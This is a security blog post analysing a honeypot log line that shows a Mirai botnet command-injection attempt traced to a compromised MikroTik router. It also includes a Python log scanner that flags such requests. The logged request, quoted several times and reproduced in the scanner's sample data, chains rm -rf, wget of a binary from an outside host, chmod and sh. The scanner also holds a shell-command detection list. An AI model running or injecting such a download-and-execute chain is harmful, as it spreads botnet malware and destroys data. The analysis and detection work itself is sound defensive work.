
Investigating a Cyber Attack: Step by Step

Author: Fernando Amatte, Director of Red Team Services, Latin America

As a cybersecurity professional, I have my own laboratory with some virtual equipment acquired around the world. The goal is simply to research and conduct tests to identify new attacks, solutions and possibilities.

When the equipment is not in use, it keeps running as "honeypots": computers left on for the purpose of being attacked. Each computer records the access attempts it receives, that is, it keeps a log. Again, the goal is future research and analysis.

This weekend I came across something very curious. While analyzing the logs of a web server, I identified the following line (the IP addresses are anonymized).

77.xxx.xxx.xxxx - - [27/Jun/2020:22:42:32 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"

Parsing the Log

Who?
IP address of the host making the connection: 77.xxx.xxx.xxxx

When?
Date and time: 27/Jun/2020:22:42:32 +0000

What?
What was the requester looking for or accessing? /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws

Answer
Response code (success or error)? 404

Browser
Which browser was used for this access? Hello, world

The "What?" and "Browser" fields stand out in this line. It is unusual for a legitimate request to produce a log line containing Linux commands. In addition, the last field should identify the browser (Mozilla, Chrome, etc.), but instead the text "Hello, world" appears.


Analyzing the Command

In the request, each space is encoded as "+" and the individual commands are separated by ";". Decoded, the chain reads as follows:

Command                                     Function
cd /tmp                                     Go to the temporary directory
rm -rf *                                    Delete all content from this location
wget 185.yyy.yyy.yyy/bins/UnHAnaAW.x86      Download the file UnHAnaAW.x86 from 185.yyy.yyy.yyy
chmod 777 /tmp/UnHAnaAW.x86                 Change the permissions on the UnHAnaAW.x86 file so that anyone can read, write and execute it
sh /tmp/UnHAnaAW.x86 w00dy.jaws             Run the UnHAnaAW.x86 file with the shell, passing the text "w00dy.jaws" as a parameter


The "What?" field above shows that the attacker would be able to execute commands on the victims' machines. In other words, he could have full access to the equipment and control it as he wishes.
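To make the "Who / When / What / Answer / Browser" breakdown and the command table above reproducible over a whole log file, here is an added Python example (not code from the original post) that parses Apache combined-format lines, decodes the URL-encoded query back into the chained shell commands and flags the two things the article points out: shell commands where a path or query should be, and a user agent that is not a browser. The sample log lines, the RFC 5737 documentation addresses and the indicator rules are constructed for this example; the request shape, the file name and the "Hello, world" user agent follow the article.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines in Apache "combined" format (not taken from the
# post's honeypot). Line 1 mirrors the shape of the request discussed in the
# article, with RFC 5737 documentation addresses standing in for the anonymized
# ones; lines 2 and 3 are ordinary browsing used as a benign baseline.
SAMPLE_LOG = """\
203.0.113.77 - - [27/Jun/2020:22:42:32 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+198.51.100.185/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"
198.51.100.5 - - [27/Jun/2020:22:43:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/78.0"
198.51.100.6 - - [27/Jun/2020:22:43:10 +0000] "GET /search?q=cd+players HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/83.0"
"""

# One regex for the combined log format: who, when, what, answer, browser.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shell commands that have no business appearing as words in a URL query, with
# the short "function" notes used for the Command / Function table below.
COMMAND_NOTES = {
    "cd": "change to a directory",
    "rm": "delete files",
    "wget": "download a file over HTTP",
    "curl": "download a file over HTTP",
    "chmod": "change file permissions",
    "sh": "run a file with the shell",
    "busybox": "run a BusyBox applet",
}

# Substrings a real browser user agent normally carries.
BROWSER_TOKENS = ("Mozilla", "Chrome", "Safari", "Opera", "Edge")


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does
    not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def decode_request(path):
    """Split the query string off the path, URL-decode it ('+' becomes a
    space) and break the result into the individual commands chained with ';'.
    A benign query such as '/search?q=cd+players' simply yields ['q=cd players']."""
    _, _, query = path.partition("?")
    decoded = unquote_plus(query)
    return [cmd.strip() for cmd in decoded.split(";") if cmd.strip()]


def explain_commands(commands):
    """Pair each decoded command with the note for its first word, mirroring
    the Command / Function table in the article."""
    rows = []
    for cmd in commands:
        first = cmd.split()[0]
        rows.append((cmd, COMMAND_NOTES.get(first, "(not a known shell command)")))
    return rows


def assess(entry):
    """Return the indicators that make a request look like a command-injection
    attempt rather than ordinary browsing; an empty list means nothing stood out."""
    indicators = []
    commands = decode_request(entry["path"])
    first_words = {cmd.split()[0] for cmd in commands}
    shell_words = sorted(first_words & set(COMMAND_NOTES))
    if shell_words:
        indicators.append("shell commands in the request: " + ", ".join(shell_words))
    if len(commands) > 1 and shell_words:
        indicators.append(f"{len(commands)} commands chained with ';'")
    if {"wget", "curl"} & first_words and {"sh", "chmod", "busybox"} & first_words:
        indicators.append("download-and-execute chain (fetch, then chmod/sh)")
    if not any(tok in entry["agent"] for tok in BROWSER_TOKENS):
        indicators.append(f"non-browser user agent: {entry['agent']!r}")
    return indicators


def scan(log_text):
    """Parse every line and return (entry, indicators) for each line that
    tripped at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        indicators = assess(entry)
        if indicators:
            hits.append((entry, indicators))
    return hits


if __name__ == "__main__":
    for entry, indicators in scan(SAMPLE_LOG):
        print(f"Who:     {entry['ip']}")
        print(f"When:    {entry['time']}")
        print(f"What:    {entry['path']}")
        print(f"Answer:  {entry['status']}")
        print(f"Browser: {entry['agent']}")
        for ind in indicators:
            print(f"  - {ind}")
        print("  Command / Function:")
        for cmd, note in explain_commands(decode_request(entry["path"])):
            print(f"    {cmd:45} {note}")
```

Only the first constructed line trips any indicator; the third line contains the word "cd" inside a normal search query and is deliberately left alone, because the rules look at the first word of each ';'-separated piece rather than at substrings. In practice the same scan can be pointed at a real access log by replacing SAMPLE_LOG with the file contents.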

Analyzing the location where the download should have been performed, we found a repository with binary files for different platforms or equipment, as shown in the figure below:

That this is a malicious action is also confirmed by looking up the file UnHAnaAW.x86 on VirusTotal, which shows the file flagged as malicious by 40 different anti-malware engines.

Many of these anti-malware engines classify this file as a variant of Mirai, a malware family and botnet that has been causing damage since 2016. In this case, after checking figures 2 and 3, we see that the file was created on 09-June-2020 and was submitted to VirusTotal the next day, 10-June-2020.

We conclude, therefore, that this file is new and different from the 2016 version. It may contain more harmful features, but is still a part of the same family seen since 2016.

Looking up the IP address that made the request, we found a MikroTik router.

So what does all this mean?
 
  • The Mikrotik router is hacked and looking for new victims for the botnet
  • It is difficult and perhaps impossible to install antivirus software on some types of equipment
  • There are several infected machines around the world
  • We do not know:
    • How these machines will be used
    • Who will be the victims
    • When the next mass attack will happen

Conclusion

Right now, devices in your home may be part of a network of previously hacked machines that is trying to hack into other devices. This can have an unimaginable impact and cause unknown losses to companies and individuals. It is therefore worth stressing the need to keep home devices in general up to date.

This investigation was superficial, so it is not known how many machines there are in this botnet. Regardless, any malicious machine is always a big risk. For more than a year, different versions of this malware have been scouring the internet for new victims, and we have no way of predicting when a new mass attack will happen.

If you're a regular technology user, update all of your devices. Help us in this battle against cyber security attacks and intrusions. If you are a cybersecurity professional, review your logs for anomalies and keep all systems and devices, as well as your security policy, up to date.


2 Comments

  1. Maria Sanchez

    Excellent write-up! Thanks!

  2. Ulrich Raape

    Very helpful! I just encountered similar log entries and found this article. Thank you!
